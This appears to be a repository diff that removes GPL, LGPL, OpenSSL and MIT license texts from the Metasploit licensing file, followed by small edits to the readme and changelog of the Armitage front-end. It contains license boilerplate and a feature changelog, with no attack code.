-If any portion of this section is held invalid or unenforceable under
-any particular circumstance, the balance of the section is intended to
-apply and the section as a whole is intended to apply in other
-circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system, which is
-implemented by public license practices.  Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
-  8. If the distribution and/or use of the Prot holder who places the Program under this License
-may add an explicit geographical distribution limitation excluding
-those countries, so that distribution is permitted only in or among
-countries not thus excluded.  In such case, this License incorporates
-the limitation as if written in the body of this License.
-
-  9. The Free Software Foundation may publish revised and/or new versions
-of the General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-Each version is given a distinguishing version number.  If the Program
-specifies a version number of this License which applies to it and "any
-later version", you have the option of following the terms and conditions
-either of that version or of any later version published by the Free
-Software Foundation.  If the Program does not specify a version number of
-this License, you may choose any version ever published by the Free Software
-Foundation.
-
-  10. If you wish to incorporate parts of the Program into other free
-programs whose distribution conditions are different, write to the author
-to ask for permission.  For software which is copyrighted by the Free
-Software Foundation, write to the Free Software Foundation; we sometimes
-make exceptions for this.  Our decision will be guided by the two goals
-of preserving the free status of all derivatives of our free software and
-of promoting the sharing and reuse of software generally.
-
-                            NO WARRANTY
-
-  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
-FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
-OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
-PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
-OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
-MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
-TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
-PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
-REPAIR OR CORRECTION.
-
-  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
-REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
-INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
-OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
-TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
-YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
-PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGES.
-
-                     END OF TERMS AND CONDITIONS
-
-````
-
-
-
-LGPL
-====
- - The Metasm library located under lib/metasm.
-   Copyright (C) 2006-2010 Yoann GUILLOT
- - The PcapRub library located under external/pcaprub
- - The Ruby-Lorcon library located under external/ruby-lorcon
- - Gem components located under lib/gemcache/
-   * coderay - Copyright (c) 2006-2011 by murphy (Kornelius Kalnbach) <murphy rubychan de>
-
-
-````
-		  GNU LESSER GENERAL PUBLIC LICENSE
-		       Version 2.1, February 1999
-
- Copyright (C) 1991, 1999 Free Software Foundation, Inc.
- 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
- Everyone is permitted to copy and distribute verbatim copies
- of this license document, but changing it is not allowed.
-
-[This is the first released version of the Lesser GPL.  It also counts
- as the successor of the GNU Library Public License, version 2, hence
- the version number 2.1.]
-
-			    Preamble
-
-  The licenses for most software are designed to take away your
-freedom to share and change it.  By contrast, the GNU General Public
-Licenses are intended to guarantee your freedom to share and change
-free software--to make sure the software is free for all its users.
-
-  This license, the Lesser General Public License, applies to some
-specially designated software packages--typically libraries--of the
-Free Software Foundation and other authors who decide to use it.  You
-can use it too, but we suggest you first think carefully about whether
-this license or the ordinary General Public License is the better
-strategy to use in any particular case, based on the explanations below.
-
-  When we speak of free software, we are referring to freedom of use,
-not price.  Our General Public Licenses are designed to make sure that
-you have the freedom to distribute copies of free software (and charge
-for this service if you wish); that you receive source code or can get
-it if you want it; that you can change the software and use pieces of
-it in new free programs; and that you are informed that you can do
-these things.
-
-  To protect your rights, we need to make restrictions that forbid
-distributors to deny you these rights or to ask you to surrender these
-rights.  These restrictions translate to certain responsibilities for
-you if you distribute copies of the library or if you modify it.
-
-  For example, if you distribute copies of the library, whether gratis
-or for a fee, you must give the recipients all the rights that we gave
-you.  You must make sure that they, too, receive or can get the source
-code.  If you link other code with the library, you must provide
-complete object files to the recipients, so that they can relink them
-with the library after making changes to the library and recompiling
-it.  And you must show them these terms so they know their rights.
-
-  We protect your rights with a two-step method: (1) we copyright the
-library, and (2) we offer you this license, which gives you legal
-permission to copy, distribute and/or modify the library.
-
-  To protect each distributor, we want to make it very clear that
-there is no warranty for the free library.  Also, if the library is
-modified by someone else and passed on, the recipients should know
-that what they have is not the original version, so that the original
-author's reputation will not be affected by problems that might be
-introduced by others.
-
-  Finally, software patents pose a constant threat to the existence of
-any free program.  We wish to make sure that a company cannot
-effectively restrict the users of a free program by obtaining a
-restrictive license from a patent holder.  Therefore, we insist that
-any patent license obtained for a version of the library must be
-consistent with the full freedom of use specified in this license.
-
-  Most GNU software, including some libraries, is covered by the
-ordinary GNU General Public License.  This license, the GNU Lesser
-General Public License, applies to certain designated libraries, and
-is quite different from the ordinary General Public License.  We use
-this license for certain libraries in order to permit linking those
-libraries into non-free programs.
-
-  When a program is linked with a library, whether statically or using
-a shared library, the combination of the two is legally speaking a
-combined work, a derivative of the original library.  The ordinary
-General Public License therefore permits such linking only if the
-entire combination fits its criteria of freedom.  The Lesser General
-Public License permits more lax criteria for linking other code with
-the library.
-
-  We call this license the "Lesser" General Public License because it
-does Less to protect the user's freedom than the ordinary General
-Public License.  It also provides other free software developers Less
-of an advantage over competing non-free programs.  These disadvantages
-are the reason we use the ordinary General Public License for many
-libraries.  However, the Lesser license provides advantages in certain
-special circumstances.
-
-  For example, on rare occasions, there may be a special need to
-encourage the widest possible use of a certain library, so that it becomes
-a de-facto standard.  To achieve this, non-free programs must be
-allowed to use the library.  A more frequent case is that a free
-library does the same job as widely used non-free libraries.  In this
-case, there is little to gain by limiting the free library to free
-software only, so we use the Lesser General Public License.
-
-  In other cases, permission to use a particular library in non-free
-programs enables a greater number of people to use a large body of
-free software.  For example, permission to use the GNU C Library in
-non-free programs enables many more people to use the whole GNU
-operating system, as well as its variant, the GNU/Linux operating
-system.
-
-  Although the Lesser General Public License is Less protective of the
-users' freedom, it does ensure that the user of a program that is
-linked with the Library has the freedom and the wherewithal to run
-that program using a modified version of the Library.
-
-  The precise terms and conditions for copying, distribution and
-modification follow.  Pay close attention to the difference between a
-"work based on the library" and a "work that uses the library".  The
-former contains code derived from the library, whereas the latter must
-be combined with the library in order to run.
-
-		  GNU LESSER GENERAL PUBLIC LICENSE
-   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-  0. This License Agreement applies to any software library or other
-program which contains a notice placed by the copyright holder or
-other authorized party saying it may be distributed under the terms of
-this Lesser General Public License (also called "this License").
-Each licensee is addressed as "you".
-
-  A "library" means a collection of software functions and/or data
-prepared so as to be conveniently linked with application programs
-(which use some of those functions and data) to form executables.
-
-  The "Library", below, refers to any such software library or work
-which has been distributed under these terms.  A "work based on the
-Library" means either the Library or any derivative work under
-copyright law: that is to say, a work containing the Library or a
-portion of it, either verbatim or with modifications and/or translated
-straightforwardly into another language.  (Hereinafter, translation is
-included without limitation in the term "modification".)
-
-  "Source code" for a work means the preferred form of the work for
-making modifications to it.  For a library, complete source code means
-all the source code for all modules it contains, plus any associated
-interface definition files, plus the scripts used to control compilation
-and installation of the library.
-
-  Activities other than copying, distribution and modification are not
-covered by this License; they are outside its scope.  The act of
-running a program using the Library is not restricted, and output from
-such a program is covered only if its contents constitute a work based
-on the Library (independent of the use of the Library in a tool for
-writing it).  Whether that is true depends on what the Library does
-and what the program that uses the Library does.
-  
-  1. You may copy and distribute verbatim copies of the Library's
-complete source code as you receive it, in any medium, provided that
-you conspicuously and appropriately publish on each copy an
-appropriate copyright notice and disclaimer of warranty; keep intact
-all the notices that refer to this License and to the absence of any
-warranty; and distribute a copy of this License along with the
-Library.
-
-  You may charge a fee for the physical act of transferring a copy,
-and you may at your option offer warranty protection in exchange for a
-fee.
-
-  2. You may modify your copy or copies of the Library or any portion
-of it, thus forming a work based on the Library, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
-    a) The modified work must itself be a software library.
-
-    b) You must cause the files modified to carry prominent notices
-    stating that you changed the files and the date of any change.
-
-    c) You must cause the whole of the work to be licensed at no
-    charge to all third parties under the terms of this License.
-
-    d) If a facility in the modified Library refers to a function or a
-    table of data to be supplied by an application program that uses
-    the facility, other than as an argument passed when the facility
-    is invoked, then you must make a good faith effort to ensure that,
-    in the event an application does not supply such function or
-    table, the facility still operates, and performs whatever part of
-    its purpose remains meaningful.
-
-    (For example, a function in a library to compute square roots has
-    a purpose that is entirely well-defined independent of the
-    application.  Therefore, Subsection 2d requires that any
-    application-supplied function or table used by this function must
-    be optional: if the application does not supply it, the square
-    root function must still compute square roots.)
-
-These requirements apply to the modified work as a whole.  If
-identifiable sections of that work are not derived from the Library,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works.  But when you
-distribute the same sections as part of a whole which is a work based
-on the Library, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote
-it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Library.
-
-In addition, mere aggregation of another work not based on the Library
-with the Library (or with a work based on the Library) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
-  3. You may opt to apply the terms of the ordinary GNU General Public
-License instead of this License to a given copy of the Library.  To do
-this, you must alter all the notices that refer to this License, so
-that they refer to the ordinary GNU General Public License, version 2,
-instead of to this License.  (If a newer version than version 2 of the
-ordinary GNU General Public License has appeared, then you can specify
-that version instead if you wish.)  Do not make any other change in
-these notices.
-
-  Once this change is made in a given copy, it is irreversible for
-that copy, so the ordinary GNU General Public License applies to all
-subsequent copies and derivative works made from that copy.
-
-  This option is useful when you wish to copy part of the code of
-the Library into a program that is not a library.
-
-  4. You may copy and distribute the Library (or a portion or
-derivative of it, under Section 2) in object code or executable form
-under the terms of Sections 1 and 2 above provided that you accompany
-it with the complete corresponding machine-readable source code, which
-must be distributed under the terms of Sections 1 and 2 above on a
-medium customarily used for software interchange.
-
-  If distribution of object code is made by offering access to copy
-from a designated place, then offering equivalent access to copy the
-source code from the same place satisfies the requirement to
-distribute the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
-  5. A program that contains no derivative of any portion of the
-Library, but is designed to work with the Library by being compiled or
-linked with it, is called a "work that uses the Library".  Such a
-work, in isolation, is not a derivative work of the Library, and
-therefore falls outside the scope of this License.
-
-  However, linking a "work that uses the Library" with the Library
-creates an executable that is a derivative of the Library (because it
-contains portions of the Library), rather than a "work that uses the
-library".  The executable is therefore covered by this License.
-Section 6 states terms for distribution of such executables.
-
-  When a "work that uses the Library" uses material from a header file
-that is part of the Library, the object code for the work may be a
-derivative work of the Library even though the source code is not.
-Whether this is true is especially significant if the work can be
-linked without the Library, or if the work is itself a library.  The
-threshold for this to be true is not precisely defined by law.
-
-  If such an object file uses only numerical parameters, data
-structure layouts and accessors, and small macros and small inline
-functions (ten lines or less in length), then the use of the object
-file is unrestricted, regardless of whether it is legally a derivative
-work.  (Executables containing this object code plus portions of the
-Library will still fall under Section 6.)
-
-  Otherwise, if the work is a derivative of the Library, you may
-distribute the object code for the work under the terms of Section 6.
-Any executables containing that work also fall under Section 6,
-whether or not they are linked directly with the Library itself.
-
-  6. As an exception to the Sections above, you may also combine or
-link a "work that uses the Library" with the Library to produce a
-work containing portions of the Library, and distribute that work
-under terms of your choice, provided that the terms permit
-modification of the work for the customer's own use and reverse
-engineering for debugging such modifications.
-
-  You must give prominent notice with each copy of the work that the
-Library is used in it and that the Library and its use are covered by
-this License.  You must supply a copy of this License.  If the work
-during execution displays copyright notices, you must include the
-copyright notice for the Library among them, as well as a reference
-directing the user to the copy of this License.  Also, you must do one
-of these things:
-
-    a) Accompany the work with the complete corresponding
-    machine-readable source code for the Library including whatever
-    changes were used in the work (which must be distributed under
-    Sections 1 and 2 above); and, if the work is an executable linked
-    with the Library, with the complete machine-readable "work that
-    uses the Library", as object code and/or source code, so that the
-    user can modify the Library and then relink to produce a modified
-    executable containing the modified Library.  (It is understood
-    that the user who changes the contents of definitions files in the
-    Library will not necessarily be able to recompile the application
-    to use the modified definitions.)
-
-    b) Use a suitable shared library mechanism for linking with the
-    Library.  A suitable mechanism is one that (1) uses at run time a
-    copy of the library already present on the user's computer system,
-    rather than copying library functions into the executable, and (2)
-    will operate properly with a modified version of the library, if
-    the user installs one, as long as the modified version is
-    interface-compatible with the version that the work was made with.
-
-    c) Accompany the work with a written offer, valid for at
-    least three years, to give the same user the materials
-    specified in Subsection 6a, above, for a charge no more
-    than the cost of performing this distribution.
-
-    d) If distribution of the work is made by offering access to copy
-    from a designated place, offer equivalent access to copy the above
-    specified materials from the same place.
-
-    e) Verify that the user has already received a copy of these
-    materials or that you have already sent this user a copy.
-
-  For an executable, the required form of the "work that uses the
-Library" must include any data and utility programs needed for
-reproducing the executable from it.  However, as a special exception,
-the materials to be distributed need not include anything that is
-normally distributed (in either source or binary form) with the major
-components (compiler, kernel, and so on) of the operating system on
-which the executable runs, unless that component itself accompanies
-the executable.
-
-  It may happen that this requirement contradicts the license
-restrictions of other proprietary libraries that do not normally
-accompany the operating system.  Such a contradiction means you cannot
-use both them and the Library together in an executable that you
-distribute.
-
-  7. You may place library facilities that are a work based on the
-Library side-by-side in a single library together with other library
-facilities not covered by this License, and distribute such a combined
-library, provided that the separate distribution of the work based on
-the Library and of the other library facilities is otherwise
-permitted, and provided that you do these two things:
-
-    a) Accompany the combined library with a copy of the same work
-    based on the Library, uncombined with any other library
-    facilities.  This must be distributed under the terms of the
-    Sections above.
-
-    b) Give prominent notice with the combined library of the fact
-    that part of it is a work based on the Library, and explaining
-    where to find the accompanying uncombined form of the same work.
-
-  8. You may not copy, modify, sublicense, link with, or distribute
-the Library except as expressly provided under this License.  Any
-attempt otherwise to copy, modify, sublicense, link with, or
-distribute the Library is void, and will automatically terminate your
-rights under this License.  However, parties who have received copies,
-or rights, from you under this License will not have their licenses
-terminated so long as such parties remain in full compliance.
-
-  9. You are not required to accept this License, since you have not
-signed it.  However, nothing else grants you permission to modify or
-distribute the Library or its derivative works.  These actions are
-prohibited by law if you do not accept this License.  Therefore, by
-modifying or distributing the Library (or any work based on the
-Library), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Library or works based on it.
-
-  10. Each time you redistribute the Library (or any work based on the
-Library), the recipient automatically receives a license from the
-original licensor to copy, distribute, link with or modify the Library
-subject to these terms and conditions.  You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties with
-this License.
-
-  11. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Library at all.  For example, if a patent
-license would not permit royalty-free redistribution of the Library by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Library.
-
-If any portion of this section is held invalid or unenforceable under any
-particular circumstance, the balance of the section is intended to apply,
-and the section as a whole is intended to apply in other circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system which is
-implemented by public license practices.  Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
-  12. If the distribution and/or use of the Library is restricted in
-certain countries either by patents or by copyrighted interfaces, the
-original copyright holder who places the Library under this License may add
-an explicit geographical distribution limitation excluding those countries,
-so that distribution is permitted only in or among countries not thus
-excluded.  In such case, this License incorporates the limitation as if
-written in the body of this License.
-
-  13. The Free Software Foundation may publish revised and/or new
-versions of the Lesser General Public License from time to time.
-Such new versions will be similar in spirit to the present version,
-but may differ in detail to address new problems or concerns.
-
-Each version is given a distinguishing version number.  If the Library
-specifies a version number of this License which applies to it and
-"any later version", you have the option of following the terms and
-conditions either of that version or of any later version published by
-the Free Software Foundation.  If the Library does not specify a
-license version number, you may choose any version ever published by
-the Free Software Foundation.
-
-  14. If you wish to incorporate parts of the Library into other free
-programs whose distribution conditions are incompatible with these,
-write to the author to ask for permission.  For software which is
-copyrighted by the Free Software Foundation, write to the Free
-Software Foundation; we sometimes make exceptions for this.  Our
-decision will be guided by the two goals of preserving the free status
-of all derivatives of our free software and of promoting the sharing
-and reuse of software generally.
-
-			    NO WARRANTY
-
-  15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO
-WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW.
-EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
-OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY
-KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
-PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE
-LIBRARY IS WITH YOU.  SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME
-THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
-
-  16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN
-WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY
-AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU
-FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR
-CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE
-LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING
-RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A
-FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF
-SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
-DAMAGES.
-
-		     END OF TERMS AND CONDITIONS
-
-````
-
-
-
-OpenSSL
-=======
- - The OpenSSL library embedded into the Meterpreter payload binaries and the
-   corresponding header files in the source tree
-
-````
-The OpenSSL toolkit stays under a dual license, i.e. both the conditions of
-the OpenSSL License and the original SSLeay license apply to the toolkit.
-See below for the actual license texts. Actually both licenses are BSD-style
-Open Source licenses. In case of any license issues related to OpenSSL
-please contact openssl-core@openssl.org.
-
-OpenSSL License
----------------
-/* ====================================================================
- * Copyright (c) 1998-2011 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT `AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
- Original SSLeay License
- -----------------------
-
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG `AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-````
-
-
-MIT
-===
- - The SSHKey library located under lib/sshkey.
-   Copyright (c) 2011 James Miller
- - The Net::SSH library located under lib/net/ssh.
-   Copyright (c) 2008 Jamis Buck <jamis@37signals.com>
- - Anemone located under lib/anemone
-   Copyright (c) 2009 Vertive, Inc.
- - RKelly located under lib/rkelly/
-   Copyright (c) 2007, 2008, 2009 Aaron Patterson, John Barnette
- - Gem components located under lib/gemcache
-   * actionmailer - Copyright (c) 2004-2011 David Heinemeier Hansson
-   * actionpack - Copyright (c) 2004-2011 David Heinemeier Hansson
-   * activemodel - Copyright (c) 2004-2011 David Heinemeier Hansson
-   * activerecord - Copyright (c) 2004-2011 David Heinemeier Hansson
-   * activeresource - Copyright (c) 2006-2011 David Heinemeier Hansson
-   * activesupport - Copyright (c) 2005-2011 David Heinemeier Hansson
-   * authlogic - Copyright (c) 2011 Ben Johnson of Binary Logic
-   * carrierwave - Copyright (c) 2008-2012 Jonas Nicklas
-   * chunky_png - Copyright (c) 2010 Willem van Bergen
-   * daemons - Copyright (c) 2005-2012 Thomas Uehlinger
-   * diff-lcs - Copyright 2004–2011 Austin Ziegler
-   * formtastic - Copyright (c) 2008-2010 Justin French
-   * fssm - Copyright (c) 2011 Travis Tilley
-   * hike - Copyright (c) 2011 Sam Stephenson
-   * i18n - Copyright (c) 2008 The Ruby I18n team
-   * jquery-rails - Copyright (c) 2010 Andre Arko
-   * liquid - Copyright (c) 2005, 2006 Tobias Luetke
-   * method_source - Copyright (c) 2011 John Mair (banisterfiend)
-   * multi_json - Copyright (c) 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
-   * rack - Copyright (c) 2007, 2008, 2009, 2010 Christian Neukirchen <purl.org/net/chneukirchen>
-   * rack-cache - Copyright (c) 2008 Ryan Tomayko <http://tomayko.com/about>
-   * rack-ssl - Copyright (c) 2010 Joshua Peek
-   * rake - Copyright (c) 2003, 2004 Jim Weirich
-   * slop - Copyright (c) 2012 Lee Jarvis
-   * sprockets - Copyright (c) 2011 Sam Stephenson, Copyright (c) 2011 Joshua Peek
-   * state_machine - Copyright (c) 2006-2012 Aaron Pfeifer
-   * thor - Copyright (c) 2008 Yehuda Katz
-   * tilt - Copyright (c) 2010 Ryan Tomayko <http://tomayko.com/about>
-   * treetop - Copyright (c) 2007 Nathan Sobo
-   * tzinfo - Copyright (c) 2005-2006 Philip Ross
-
-
-
-
-````
-Permission is hereby granted, free of charge, to any person obtaining
-a copy of this software and associated documentation files (the
-"Software"), to deal in the Software without restriction, including
-without limitation the rights to use, copy, modify, merge, publish,
-distribute, sublicense, and/or sell copies of the Software, and to
-permit persons to whom the Software is furnished to do so, subject to
-the following conditions:
-
-The above copyright notice and this permission notice shall be
-included in all copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
-EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
-MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
-NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
-LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
-OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
-WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-
-````
-

data/armitage/readme.txt

@@ -60,7 +60,7 @@ sure you peruse the FAQ and Manual first.
 7. License
    -------
 
-(c) 2010-2012 Raphael Mudge. This project is licensed under the BSD license. 
+(c) 2010-2013 Raphael Mudge. This project is licensed under the BSD license. 
 See section 8 for more information.
 
 lib/jgraphx.jar is used here within the terms of the BSD license offered by

data/armitage/whatsnew.txt

@@ -1,6 +1,50 @@
 Armitage Changelog
 ==================
 
+23 Jan 13 (tested against msf 16351)
+---------
+- Added helpers to set EXE::Custom and EXE::Template options.
+- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts
+- Cleaned up Armitage -> SOCKS Proxy job management code. The code to
+  check if a proxy server is up was deadlock prone. Removed it.
+- Starting SOCKS Proxy module now opens a tab displaying the module
+  start process. An event is posted to the event log too.
+- Created an option helper to select credentials for SMBUser, SMBPass, 
+  USERNAME, and PASSWORD. 
+- Added a feature to label hosts. A label will show up in its own column
+  in table view or below all info in graph view. Any team member may
+  change a label through [host] -> host -> Set Label. You may also use
+  dynamic workspaces to show hosts with certain labels attached.
+- Fixed bad things happening when connecting Armitage to 'localhost' and
